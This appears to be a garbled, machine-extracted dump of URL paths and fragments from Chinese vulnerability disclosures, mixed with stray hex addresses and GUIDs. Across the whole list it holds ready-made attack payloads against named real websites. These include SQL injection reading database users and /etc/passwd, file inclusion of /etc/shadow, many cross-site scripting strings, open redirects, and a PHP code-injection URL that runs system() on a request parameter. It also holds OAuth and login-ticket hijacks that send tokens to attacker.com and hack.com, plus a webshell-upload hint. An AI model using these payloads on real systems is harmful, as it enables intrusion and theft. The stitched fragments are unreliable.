/parse_share.do /parse_share.do?link=http://2130706433 /parse_share.do?link=http://2130706433:8080 /parse_share.do?link=file:///etc/passwd /parse_share.do?link=file:///etc/sysconfig/ /parse_share.do?link=file:///etc/shadow /parse_share.do?link=%3Cinput%20onclick=alert('Hola!wooyun!')%3E /transactions_team.php文件“id”参数,没有对用户提交的数据作过滤,导致注入漏洞。 0023:89441428= /invite/friends.php存在好友信息 /simp_search.php?locationid=1&subcatid=27&manuid=0&keyword= /cbportal/userinfo/showRegister.action /sp1/act/chartmall.chart.action /cbportal/userinfo/showRegister.action /autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback /autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback /autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback /forums/tag.php文件中的srchuid存在SQL注入 /xxx.png这个格式,如果字符串的起始于结尾都不符合,就会清空,比如javascript伪协议,双引号等 /web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27 /comment/list /cgi-bin/login?fun=passport&target=MLIST&t=login.js&pagesize=10&resp_charset=UTF8 /cgi-bin/mail_list?flag=new&s=unread&folderid=8&folderid=1&folderid=3&folderid=user&fun=slock&sid=KCSRLFNrsbsbsbsCR9TjJR1djyz&pagesize=10&resp_charset=UTF8&t=mail_list.js 0023:81123880=00000937 0023:81123880=00000937 00015BE4 00015BD7j 00015BE4 00015BE7 00015BED 00015BF3 00015BF4 00015BF5 00015BFA 00015C00 00015C01 00015C06 00015C09 00015C0F 00015C11 00015C17 00015C18 00015C19 000107B0 00015C01p 000107B0 000107B0 000107B0 000107B0 000107B2 000107B3 000107B5 000107B8 000107BB 000107BD 000107C0 000107C0 000107C2 000107C5 000107C7 000107CA 000107CC 000107CD /viewUser.action?id=6220 /zhuanti/admin/user_zhuanti.php?pagedata=1&chooseid=1&update=1&id=21791#input /septwolves/play.php?vid=90 /Member/RemindPWD.asp?email=&uid=&signin_logintype=&done= /reader/j_mkdir www.douban.com的ck值相同并在一个session中保持一致 /Deal_Cookies.asp?nexturl= / /nginx-securit.html xunlei.com/movie/public_html/movie_search_new.php xunlei.com/movie/public_html/movie_search_new.php /report/accounts/checkLogin?password=xx&username=xx /ucpack/dlmobile/control/generic_packs.php?pc=999 /uinfo/?callback=requestImstate&type=json&uids=25481a89e4bdef294e4aeab9&randin=1923658608&detaillen=256&t= hi.baidu.com/可爱兔唐雯玉 /nginx-securit.html /playvbox/%E9%9B%AA%E3%80%81%E6%97%A0%E9%9F%B3%E3%80%81%E7%AA%93%E8%BE%BA%E3%81%AB%E3%81%A6/?zd=0&start=0&ourl=http://www.baidu.com/ /fuxudong/blog/item/d918d7ddb66624e276c638d6.html /user_look.aspx?ID=axyypy /traf/ http://utility.baidu.com/traf/detail.php?aid=215 /do/add?it=&iu=!-- / /robots.txt /destguides/journals/AllSingleJournals.aspx?Writing=130079%27%273 /admin/index.php /workroom.php)第三方开发团队“潮流少年工作室 /forum.php?mod=viewthread&tid=1632898),因变量未初始化及过滤不严导致SQL注入及跨站脚本漏洞。 moodwall_inc_php_2 /newhot/admin/login.jsp /admin/ /last.php?aname=pps&p=zsshs / /news.php?doc=36674 /news.php?doc=36674 expression(window.open(somewhere)),就能让被攻击者在已被block的情况下点击页面任意位置触发弹出窗口 /lists.php?tag=whhyn /lists.php?tag=whhyn /admin/main.php /admin/main.php /service/account/check_with_js?return_to=http://www.douban.fm ?sig=67a2f068bc&response_nonce=1281936632&data=%2B%7C%81%21%D7%5D%AB%5B%AD%FCM%9F%0E%F75t0%2C%FFJ%8Fw%C6P%1A%B3F%16%A2%82%15%15%84%D4Vz%8C%9B%85g+%C3%C6%5D%FED9%96%84%D4Vz%8C%9B%85g+%C3%C6%5D%FED9%96&mode=id_res&return_to=http%3A%2F%2Fwww.douban.fm /ptlogin/ac/v7/js/xui.js /breachme/blog/item/bd11aa194c10db77dab4bd33.html /breachme/blog/item/0173d5441467ed41510ffe8a.html /search_result.php?company=%282015081%29%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20where%20table_schema=database()-- /breachme/blog/item/bf51c11384d7178d6538db93.html /amSynth/?p=../../../../../../../../../../../../etc/hosts%00 /amSynth/?p=../../../../../../../../../../../../etc/fstab%00 /show?a=a%3Cscript%3Ealert%281%29%3C/script%3E&r=http://www.renren.com&type=single /breachme/blog/item/9465ee311622c8a55edf0ef4.html /w2i/w2iwemarry/w2iWeMarryPl!list.action?imgid=1424%20and%201=1 /w2i/w2iwemarry/w2iWeMarryPl!list.action?imgid=1424%20and%201=2 http://toolbox.youdao.com/searchcode/iframe?style=4&product=blogsite&defaultProduct=blogsite&borderColor=ffffff&bkColor=FFFFFF&formWidth=232&domain= alert("XSS") /search.php?&gameName=%27and'1'='1 /bin F43B35B7-C29A-453F-86E9-C37412269D62 /error_report/error_report.php?title=1&contentid=1 /volunteer/act_alert.htm?org_id=152&act_id=523&titlename=%u8BA9%u6148%u5584%u6210%u4E3A%u4E00%u79CD%u5E38%u6001%u7B2B011%u671F%3Cscript%3Ealert%28%27s%27%29%3C/script%3E / /admin/login.aspx 122.225.103.104 /xwzx2.asp?id=42&id2=259 /news_show.asp?id=282 /pagecontent.asp?menu1=57&menu2=58&id=6 /aboutus.asp?id=449 /news/index.asp?classid=238 /modify_all.php?searchphone=a /modify_all.php?searchphone=a /modify_all.php?searchphone=a /modify_all.php?searchphone=a expression(alert(/深职院/)) /?id=mm3'+and+'1'%3D'0中的id参数过滤不严,导致SQL注入漏洞,但冒似淘宝对数据库的错误机制进行处理,导致网页返回正常页面,但仍可直接通过注入猜解工具直接获取帐号及密码。 /api/fusioncharts/get_from_data.php?sid=48302&aid=18099&jsoncallback=jsonp1282643851243 /download/search.php?f_name=0;URL=http://www.geovisioncn.com/news /manage/module.do?m=preview&type=pp_slide&data= /logo.gif /index.php?do=Phone.List&fid=1&t=8%3Cscript%3Ealert%28%27s%27%29;%3C/script%3E /index.php?do=Phone.List%27&fid=1&t=8 /downAction.do?file=../3g/zst/showimg.jsp /breachme/blog/item/37c7bb50c2bad5521038c2bb.html /bk.jsp?title=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 /supermarket/zonemap/zonemap.asp页面的city参数过滤不严格 /room/space.php?sid=1000040123&tab=2';%3C/script%3E%3Cscript%3Ealert('by%20pandora%20');%3C/script%3E%3Cscript%3E /classic/rdMail.php /classic/rdMail.php /v1/user/userinfo?u=611991217;alert(/ss/) /v1/user/userinfo?u=611991217;var /v1/user/userinfo?u=%36%31%31%39%39%31%32%31%37%3B%76%61%72%20%73%74%72%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3B%76%61%72%20%65%73%3D%2F%75%72%6C%3D%2F%3B%65%73%2E%65%78%65%63%28%73%74%72%29%3B%76%61%72%20%72%69%67%68%74%3D%52%65%67%45%78%70%2E%72%69%67%68%74%43%6F%6E%74%65%78%74%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%72%69%67%68%74&url=http://www.hao123.com /v1/user/userinfo?u=611991217;window.location.href=0x12 /Vote.aspx?ballotid=6012 /shequ/mu_center/muc_mymusic.php /qn_search/cxzl_ss.jsp?searchWord=%22%2F%3E%20%3Ciframe%20src%3D%22http%3A%2F%2Fwww.baidu.com%22%20width%3D800%20height%3D300%3E%3C%2Fiframe%3E /Support/Export/show/?place_name=39%CB%D1%CB%F7%A3%AD%D7%F3%B1%DF /Support/Export/show/?place_name=39%CB%D1%CB%F7%A3%AD%D7%F3%B1%DF /luren110/a_5898108.html /zhanshi_info.php /zhanshi_rate.php FAC87377-9586-4C72-A614-8C9B3CA1BF5B /list.php?keyword= /list.php?tag=%B4%F3%C8%FC /list.php?client=13&clientname= /list.php?keyword= 30A3ACF9-DA6E-4CA0-A081-E06282DF1C64 /market/center.php?action=list&trade_type=&goods_type=1 /Default/Login /edifier/?q=d /edifier/ /?area=bizsearch&cmd=bigmap&city=%E5%8C%97%E4%BA%AC&a=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&q=%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&fm=bd_sina_search /search/search.jsp?key= /search/SearchResult.jsp?key=%27%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E /qihoo.aspx?kw=hj /openfund/show_news.asp?id=2765 /bluevip/jqbgjx_xx.asp?articleid=39还有众多文件,几乎全部没有过滤,虽然用了防注程序,但是不验证cookies的提交方式,导致可以cookies注入,不过数据库为access,并且无法获取到表名,所以暂时不能利用此注入获取敏感信息 /Search.aspx?keyword=sdfsd /ria/login.php /breachme/blog/item/d94767fa81dc5c879e51463b.html /games.enet.com.cn/zhuanti/zx/action/article_v.shtml?id=102929 /?FoxNews=123.html),但分析得不够详细,利用方法也稍显麻烦,这里给出的利用方式更简单。 /?FoxNews=123.html),但分析得不够详细,利用方法也稍显麻烦,这里给出的利用方式更简单。 /show.php/?id=17808 /breachme/blog/item/0173d54455dd2242510ffe10.html /news/showdetail.php / /breachme/blog/item/b478c950b476e06c84352467.html /breachme/blog/item/3b3a88b43412127d8ad4b22a.html /r/video/static/swf/amuse_index.swf?funcGetData=alert%28/yyy/%29 /cio/erp/index7.jsp?id=1038 /!music/!player/p.php?&mids=3113856%27%29;alert%28document.cookie%29;if%28%27 /loreal/s.php?id=111%20and%201=2%20union%20select%201,user(),database(),4,5,6,7,8 /breachme/blog/item/02f35d240e909e3dc89559e1.html ModLoad ModLoad ModLoad 0023:4141413d= /opta/live.php?id=f133588'%20and%20'1'='2'%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,version(),13,14,15%20%20/*%20and%20'1'='2 www.youdao.com /search?q=beyond& /skinchooser?back_url=http%3A%2F%2Fwww.youdao.com%2Fsearch%3Fq%3Dbeyond%26%22%3E%3Cscript%3Ealert%28%27ok%27%29%3C%2Fscript%3E /activity.php?action=one_act&platform_id=1 /activity.php?action=one_act.php /con/default/act/imginfo?id=9553&type=1 /user_chk_reg.php?sort=u&user=aaaaaa%27 /download/downpage/themedown/id/1500227'/mid/144 /download/downpage/down/subid/1500231/id/1500227'/mid/144 /bug.php?action=view&id=545 /tongyongqiche/bigimg.php?id=1855 /tongyongqiche/bigimg.php?id=1855 /tongyongqiche/bigimg.php?id=1855 /single/servlet/main?force=true /test.js /picshow/showplayer.php?id=14314%27 /more/star07.php?offset=%3Cscript%3Ealert%28/liscker/%29%3C/script%3E /get_thread_list.php?subdomain=comments /get_thread_list.php?subdomain=comments /get_thread_list.php?subdomain=comments /diannao/?%E7%B1%BB%E5%9E%8B=&query=%3Cscript%3Ealert%2844%29%3B%3C%2Fscript%3E&cater=diannao /upload/201009191205373314.jpg minisite.it.sohu.com/minisite/site921/show.jsp?id=475170 minisite.it.sohu.com/minisite/site921/show.jsp?id=475170 /mutually_help_null.shtml?query=%3Cscript%3Ealert%281%29%3C/script%3E /script/user/cj/getpagecj.php,参数usrid可sql注入 /fengyun/gameredi.jsp?url=www.google.com /con/award/act/search?code=1%20and%201=2%20union%20select%20SCHEMA_NAME%20from%20INFORMATION_SCHEMA.SCHEMATA-- /callback.do?t=93b7c5177cf98b843ff90233020e13291&origURL=http://www.baidu.com/ /index.php?c=error&a=render&errno=%3Ciframe%20src%3D%22http%3A%2F%2Fwww.baidu.com%22%20width%3D800%20height%3D300%3E%3C%2Fiframe%3E /mpnhudong_content.jsp?id=44 /search.php?key=xx /c/searchone?search=1329517103 /c/searchone?search=1329517103 /kws/feedback2/his.php?app=2+and+1=2+union+select+1,2,3,4,5,database(),user(),8,9/*&uuid=622D988684F34161BC09E869DB38BF3B / / / / /plaf/login.jsf /plaf/caslogin.jsf /rights.html /cgi-bin/query / / /findluxstar/find-star/show.php?act=uname&q=w'/**/AND/**/0/**/Union/**/SELECT/**/1,2,user(),4,database(),6%23 /?controller=member&action=detail&id=109 /man/user-login.php /haier/zhengming/detail.php?id=4554 /submit/login.php /GGBJ/login.php?phone=sefrefwe /download/dosearch.php?key=w&mod=book&class_id=1 /helpinfo/faq/wenti.asp?id=10197 /user/reg/infoshow.do?u=&passport=&sappid=&type=&appdata= /listing.php /beijing/life/?promoteid= /?userid=&appid= /poetry/?page=..%2F..%2F../..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 /edit_article.php?para=0&name=%B4%BA%B7%D6 /edit_article.php?para=0&name=%B4%BA%B7%D6 /edit_article.php?para=0&name=%B4%BA%B7%D6 /attachments2008@see/month_201010/naipin_bug.7z /forum/forum_show.htm?threadId=%22%3C/script%3E%3Cscript%3Ealert%283%29%3C/script%3E /dragon/admin/commend_list.php?classid=9%20and%201=2%20union%20select%200,unhex /communion/showpic.php?consortiaid=2'%20and%203=8%20union%20select%201,2,3,4,5,6,7,user(),9,10,11,12,13,14,15%20--%20And%20'8'='11 /zhenguoli/info.php?id=116%20and%201=2%20UNION%20SELECT%201,user%28%29,3,4,5,6,7,load_file%280x2f6574632f706173737764%29,9,10,11 /unionnews/unionNewsInstenceAction.do?forward=/jsp/cbpeachdak/../zxsmile/&newsid=2630 /news/FindNewsAction.do?id=358&forward=news/ /3g/pro/index.php?sa=t254d1293v446&wm=5223?amp;iwRet=%22%3E%3Cscript%3Ealert(21)%3C/script%3E%3C%22&sprefer=sysi01&sid=7e747986b2ac7930&iwRet=true /showdiary.php /v/v.php?viewkey=SINA_159_b5c824b3531cd321a1f7 /stock/code.php?code= /url114.php?MT= /ruyanshihe/pic/item/a0119cecc26a407179f0555c.jpg /ad.htm?a /robot/repositoryBrowse.jsp?title= /coolypf/blog/item/f88b3839bc2f9b2bb8998fd0.html /search?keyword= /search/no_result?keyword= /nokiax6/play.php /philips/ASX/play.php?page=2&saiqu=%E9%83%91%E5%B7%9E&videourl=XMTczNzI4OTg0 /t2211/video.php /video.php?id=XMTY4MTk0NDQw /4209140.js /4209140.js /wc/service/video_guess_vote.php?id=1/1,2/1&flag=1 /wc/news.php?id=1%20and%201=0-- /con/default/act/darenmypage?id=9553-1 /con/default/act/darenmypage?id=9553-2 /con/default/act/darenmypage?id=9553-3 /sso_admin/user/user_forgetPassword.do?passwordBean.name=xxx /haier/zhengming/detail.php?id=4554 /callback,并携带oauth_verifier此参数,攻击者可获得并利用此参数访问合法callback即可实施攻击,从而达到session /oauth/authorize?oauth_token=AA&oauth_callback=http://attacker.com/callback /advisories/2009-1/ 2D360201-FFF5-11d1-8D03-00A0C959BC0A 4:number 4:age 5:number 5:age 6:number 6:age 7:number 7:age 8:number 8:age 9:number 9:age 10:number 10:age 11:number 11:age 12:number 12:age 2D360201-FFF5-11d1-8D03-00A0C959BC0A 2D360201-FFF5-11d1-8D03-00A0C959BC0A 2D360201-FFF5-11d1-8D03-00A0C959BC0A /lushu/show?id=9a8080a72af7fa29012afa7894f83a59 /redirect.do?url=http://99mf.net /xn6205.do?ss=a&rt=a&g= // /Product/SearchNew.aspx?new=1&k=aaa /p4p/alimama/faq.php?pageName=http://ha.ckers.org/xss /aboutus/ad/tvArticle.jsp?typeId=13 /main/adfclick?db=ctrip&bid=78,4604,9473&cid=0,0,0&sid=15154&advid=5&camid=116&show=ignore&url=http://www.baidu.com /partners/directory/particular/0%20or%200%20union%20select%201,GROUP_CONCAT%28SCHEMA_NAME%29,3,4,5,6,7,8,9%20from%20information_schema.SCHEMATA%23 /p_cs_outlet_shops_tc.jsp?mainDistrict=kl /templet/shmm/shmmSingleGoods/shmmGoodsFrame.jsp?goodId=20000526&goodType=900016 /ctripmember/journals/preview.aspx /aqli.php /7d_splb.php?type=id&cid=1 /search?q=%22%3E%3Chr%20onmouseover=alert(1)%3E /user/history?id=512655736%22%3E%3Chr%20onmouseover=alert(1)%3E%3C%22 /partner?bizvenue=http://jiepang.com/venue/A5E2C2E92C447068%22%3E%3Cinput%20onmouseover=alert(1)%3E%3C%22 /user/login?back_url=/user/resetpassword /user/login?back_url=/user/%22%3E%3Cinput%3E%3C%22 /kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 /vulndb/20050/ name name /login.php /girl.php?userID=1191 /showReward.php?&cardType=1%27 /http://fanfou.com/这样的形式绕过 /opus_detail.do?sid=e441a73c442b09562d26655d6d593369'%20and%201=2%20union%20select%201,2,3,@@version,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- /my/channel/item.srv?icode=enQCgQKJTDs&callback= /javascript /toby57/blog/item/686b70ece294cfdc2f2e2183.html name name /bbs_new/app/src/main/?action=list /bbs_new/app/src/include/db/DB.inc /bbs_new/app/src/include/db/DBError.inc /search_video/q_%5C%22%20style=%7Bleft:expRessioN%28alert%281%29%29%7D%3E%3C!-- /?somecode=some&somecode2=loooooooooooooooooooongcode red /recommend/widget?src=alert()&title=abcdefg&a;alert(document.cookie)//=fff /search/search.php?k= /css/img/ztlogo.jpg/1.php /video.php?id=457242%20and%201=2 /test.php /news/hooscargame/pt_main.php?photourl=http://www.l14of.com//xx.gif /search/search.php?prod_id=1289 1.gif.php//////////////////////////%00 /jsp/work/viewChange.jsp?orderid=11233&verid=4 /count?t=mpxO9OGMWPcv5LJ6e7CS&title=%E6%9D%8E%E5%AE%81&backurl=http://t.qq.com/gaoshang /memeber/item_0db1-25078006/&cid=&url=832432.html /memeber/item_0db1-25078006/&cid=&url=832432.html /sso/login.php?gateway&url=//t.qq.com/gaoshang /passport/cookie/clearit.aspx?ReturnUrl=http://www.baidu.com /passport/www/reg_fast.aspx?returnurl=http://www.baidu.com /item.taobao.com/item.htm_id=7941465197/%2e%2e/%2e%2e/sso/login%2ephp?gateway&url=//t.qq.com/gaoshang /admin/ /?ss=17043&rt=2&g=mt /news.php?id=20 /groupshow.php?groupid=115 /register/ /bbs/edituser.asp /gc/search.php /cgi-bin/content_new?tid=12855973215013577&num=20&order=0&fid=350&mypn=%A1%B1%3E%3Ciframe%20src=%22//%22&start=0&pn=1&gb=1&curpn=1 /?op=logout&destUrl=http://www.baidu.com /shoes?qp=%3Cscript%3Ealert(/Alan/);%3C/script%3E /shoes?qp=%3E%3Ciframe%20src=http://www.baidu.com%3E /cbportal/userinfo/showLogin.htm?backUrl=%22%3E%3Ciframe%20src=http://www.baidu.com%3E%3C/iframe%3E /cbportal/userinfo/showLogin.htm?backUrl=%22%3E%3Cscript%3Ealert(/Alan/)%3C/script%3E /ns?word=%B7%F5%BB%AF%BB%FA&ie=gb2312&cl=2&rn=20&ct=0&tn=newsrss&class=0+word=%B7%F5%BB%AF%BB%FA /requestlog?url= /price/%3f.jsp /NotLogin.do?m=login&url=%3Cscript%3Ealert(/Alan/);%3C/script%3E /NotLogin.do?m=login&url=%22%3E%3Ciframe%20src=http://www.wooyun.org/whitehats/Alan%3E%3C/iframe%3E /gate/big5/soft.ifeng.com/wap2/soft.jsp?id=86 /gate/big5/之后的内容 /my_info.xhtml?c=account /wow/talents/cn3.2.2/talents.php?b=9 /wow/talents/cn3.2.2/view.php?id=19436 /ref.php?return_url= / /equipShow.aspx?nid=140 /%3f.jsp /default/%3f.jsp /search.php /wap20/index.jsp?mid=5see9K&ch=ifengweb&vt=2 /system/work.php对author变量过滤不严 /system/work.php?author= /crossdomain.xml /has_client/whois1.asp?tongyong=yes&domain=xxx&code=0000 /downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314&displaylang=en / wanmei.com jsp /index.htm?right3=yykf.htm /info/open.asp?id=375 /click.php?site=jiaoyou /click.php?site=jiaoyou /url_check?appid=99&url=http%3A%2F%2Fwww.324324.cn%2Flevel /entries/492230/rating/did/page11 /emidas/sh_search.php?page=1&m_class=19%20and%201=1 /emidas/sh_search.php?page=1&m_class=19%20and%201=2 /kfc/couponAction!getCode?prizeType=1 alert /so?k=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastkey=%3Cscript%3Ealert%28%2F1%2F%29%3C%2Fscript%3E&c=&searchlable=0&sort=&s=content /c/person?id=-42984%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat /goSearch.sip?cate=911192&item= /common/modules/dmc/house_search/搜索框输入 /app1/query.up?code= /yh/foreign_query.php?action=4 /searchResult.htm?Search= /search.sip?pageNo=1&onePageNum=12&type=1&fulltext= /jsp/system/index.jsp?err=1 /help/wap/.svn/entries /styles/CVS/Root /img/CVS/Root /jiemuinfo.php?id=21%20and%201=2%20union%20select%201,user(),3,4,5,database(),version() /c?m=9f65cb4a8c8507ed4fece7631054973b4f13d1252bd7a7572e96ce0a84642c101a39fec47a724b5a84d87e6502ae4c4bed84356537747af1c4969c0f80fbc4277cca656a27&p=8b2a955697934eac5cb7cc3f1c4f&user=baidu&fm=sc&query=apple&qid=f5e45bd805d29e80&p1=3&btViewPost= /i?cl=2&ct=201326592&fr=t5x /artist/tag/%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22 alert(/sogili/)[/img /like?url=http%3A%2F%2Fwww.swimmingacross.com%2Fdemo%2Flike.html%27%2balert%281%29%2b%27 /dkjs/detail.php?id=-9928'%20union%20select%201,2,concat /admin/login.php etupdate.gtja.com /callback.do?&origURL=http://hi.baidu.com/iv4n_fringe / /login?service=http://hack.com/getTicket.php /getTicket.php?ticket=*********************** /sharescript/messagebox.asp?info& /zonghe.php?keyword= /main/adfclick?db=ctrip&bid=44,6327,14034&cid=0,0,0&sid=18745&advid=5&camid=59&show=ignore&url= /index.php?keyword=&field=allname&mdir=search&mod=drug_search&x=0&y=0 /code/sendCode/ /search.do?action=SearchAll&keywords= /bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc /login.aspx /other/car_b.php?type=brand&l=A&b_id=20002 /include/Ajax.aspx?type=userid&userid=aaaaaa /cgi-bin/mini/list?key= /web/topic.asmx /UserService.asmx /web/topic.asmx?op=UpdateNickNamebyPassPort / / / / /info/ent.htm?location=&keyword=&abslink=&amlink=4 /flash_upload.php?modelid=1 /v?word=%27%22%3E%22%3E%3Cscript%3Ealert%28%2F222222222%2F%29%3C%2Fscript%3E&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800 /lib/car/suggest_jsonp.php?keyword=a&callback=%3Cscript%3Ealert%28%27s%27%29%3C/script%3E /reg/register.jsp /2010mini/gomeworldcup/information.php?id=3693%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,user%28%29,10,version%28%29,12 /reg/reg0_new.jsp?product=seasky%22;location.href='//diaoyu.163.com';product= /存在php解析漏洞,上传精心构造的图片会造成php解析漏洞,生成webshell /kf/AdClick.aspx?LinkID=3&goto=http://www.wooyun.org/ /ADRefererSystem/adjump.aspx?SndaADID=tuan-save-110117&RedirectUrl=http://www.wooyun.org/ /?words= /admin/ /search.html?search= /portal/search.htm?order=relevance&view=detail&action=Search&pge=1&positions=&trades=&locations=&publishDate=0&jobType=&salary=&companyType=0&grade=-1&keywords= /account/register.do?service=http://www.jobmd.cn/user/index.do /info/infosearch.htm?keyword= /search/2010csco.html?keyword=&type=all&action=Search&submit1=%E6%90%9C%E7%B4%A2 /index.php?ctrl=login&returnurl=%22'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E /search.htm?p= www.wg365.com /index.php?sid=47669&lang=zh-Hans /www/delivery/ck.php?oaparams=2__bannerid=376__zoneid=79__OXLCA=1__cb=a33bac67e7__oadest= /tag.php?tag=%3Ciframe%20height=200%20width=300%20src=http://www.xfocus.net%3E /item.htm?id=8897422540 /item.htm?id=4064934291”,乍看之下没有什么问题,但是我们看一下代码你就明白了: /item.htm/item.php?id=4064934291才是他的真正网址,而其中2ejxzbh%2ecom这部分是经过编码的一级域名,解码后是jezbh.com, /item.htm/item.php?id=4064934291。 /cgi-bin/showchoice /cn/faq_info.aspx?id=21%20and%201=2%20union%20all%20select%201,2,3,4,5,6,user,@@version%20from%20Whir_U_Cjwt / /details.php?id=54 /class/fck/editor/fckeditor.html?InstanceName=ti_shi&Toolbar=Normal /admin/ /presend.php?id= /askquestion.php?asktitle= 9ff5c6d74f5efa31265e1c2f45e14349 /ip.jsp?q=shop.wanmei.com&x=32&y=14 /placeview?query=&call=goSearch /photo/ http://bbs.taobao.com/search/thread.htm?condition=post&q=x%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253Aajax%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgib2siKTs8L3NjcmlwdD4%253D--x%250A!ajax http://bbs.taobao.com/search/thread.htm?condition=post&q=x%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Aajax%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD5hbGVydCgib2siKTs8L3NjcmlwdD4%3D--x%0A!ajax /.svn/entries /question/XXXXXXXX.html”之后加上“?zid=10081”,如“http://zhidao.baidu.com/question/XXXXXXXX.html?zid=10081”,回车。然后再回答问题,都可以被任务系统记作完成一个零回答问题(即使该问题事实上已经有人回答) /z/r/cadger/index.html /hotel/remote/livesearch.do?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /url=http://tu67.info/?sunkaisunkai /admin/index321.php?f_error= /admin/admin_login.html /interface/glogin.php?action=check&callback= /pcdown/progress?callback= /sso/crossdomain_all.jsp?action=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E /fulldisclosure/2011/Feb/199 /linx2008/blog/item/3655ba99309de11b6f068c46.html[可以看到广大群众关于此问题的讨论 /ma/enwiki/zh_tw/Byte-order_mark /news_nr.php?id=665%20and%201=2%20union%20select%201,user(),3,4,5,6/* /gate/big5/域名 /newleft/left_frame.php?channel=foo%cf%22;alert%281%29// /wp-content/themes/design/404.php /svn/trunk/js/navigatenormal.js?v=TueFeb152011.js /NZZl /2bEs F460ADF7-2BCD-4E82-B092-E570F8644638 /manage/newbook.php /2011-02-17/17/5075555a750f4ef2f56eac867beea498.jpg /search.asp?type=soft&k=%3Cscript%3Ealert%28%27frandy%27%29%3C/script%3E /vote_flash.asp?id=4262 /flash.rar 77910CD3-5447-4CCB-92DE-35BA8198BE81 /netwarn/alert/adminMain.do /index.html /home/,会随机进入到其他用户的账户里 /ipman/na/na_Raduis_home.do /3gstock/search/notfound.php?word=%3Cscript%3Ealert%28%27pg5yl8%27%29%3C%2Fscript%3E /topgene /yahoo/sb /yahoo/re?cid=0&page=1904& /admin/login/ /static/team/ alert(/sogili/)[/img /search.php?t=156&type=news&keyword= /news.php?sid=16&id=168/**/and/**/1=2/**/union/**/select/**/1,load_file(0x2F6574632F706173737764),database(),4,5-- / /cgi-bin/weiboshow?jsonp= /admin/articleList.php?channel=glm /ADRefererSystem/adjump.aspx?&RedirectUrl= /event.ng/Type=RawValues=&Redirect= /event.ng/Type=RawValues=&Redirect= /monitor/url_list.php?confirm=0&status=0&stime=2011-02-20+23%3A10%3A00&etime=2011-02-20+23%3A19%3A59 /robots.txt/s /robots.txt/s.php /robots.txt/s.php5 /tmp/php-cgi.sock /bugs/wooyun-2010-01334 /catalog/thread/508895-250539394.htm A74BF134-5213-46B5-AF36-CE1888315DC7 A74BF134-5213-46B5-AF36-CE1888315DC7 /vehicle/page/system/login.do /webchat/webIM/webAsk.aspx?gm=49&ar=1&sv=1&rgm=49'&rar=9999&rsv=9999';}alert('s');function /interface/share.php?share_content=sdfadsf"dfsdf /ADRefererSystem/adjump.aspx?SndaADID=tuan-sdo-110117&RedirectUrl=http://www.wooyun.org/ /r_os.aspx?gm=200009600&source=010101%27&t=Bambook%u5B98%u7F51%27 /?amp;=&bd_page_type=1&from=&pu=sl@1%2Cpw@1000%2Csz@240_320%2Cpd@1%2Cfz@2%2Clp@0%2Ctpl@color%2C&st=1&uid=wk_1296181240_378&ssid=%22%27%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E /main/s?border= /ips.jcp?callback=%3Cscript%3Ealert(1)%3C/script%3E /cgi-bin/download?qq=1.txt /favlink/1 /ajax/FavLink.ashx","ajaxMethod=updatelink&content=www.wooyun.org&id=5046105&link=http%3A%2F%2Fwww.wooyun.org&name=wooyun",function(x) id:5046105 /ajax/FavLink.ashx","ajaxMethod=updatelink&content=www.wooyun.org&id="+i+"&link=http%3A%2F%2Fwww.wooyun.org&name=wooyun",function(x) /photosrc/目录名/shell文件名可获得webshell /cyesis/dpage-limitlist.action?content=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E&searchType=1 B965C48D-824F-4F30-A456-D03EC3F244EA /common/searchresult.html?key= /f/admin/listIPInfo.action / /search.php,在搜索框中输入: /static/hosting/ghosting.asp?showTop= /crossdomain.xml /crossdomain.xml php?id= songtaste.com www.songtaste.com的一台备份服务器,并且由于一些原因去掉了php的解析,而操作者很明显没有注意到该台服务器其中包含的php文件的泄漏问题。通过该问题和www上的一些应用逻辑,我可以下载到了任意的代码。 /administrator/ /administrator/lib/adodb_lite/adodb-perf-module.inc.php?last_module=Exception{};phpinfo();/* /administrator/lib/adodb_lite/adodb-perf-module.inc.php?d=w&last_module=Exception{};system(stripslashes($_GET[d]));die();/* 10003D4E 10003D4E 10003D4E 1000B3A4o 10003D4E 1000B41Co 10003D4E 10003D4E 10003D4E 10003D4E 10003D4E 10003D52 10003D54 10003D56 10003D57 10003D5B 10003D5E 10003D61 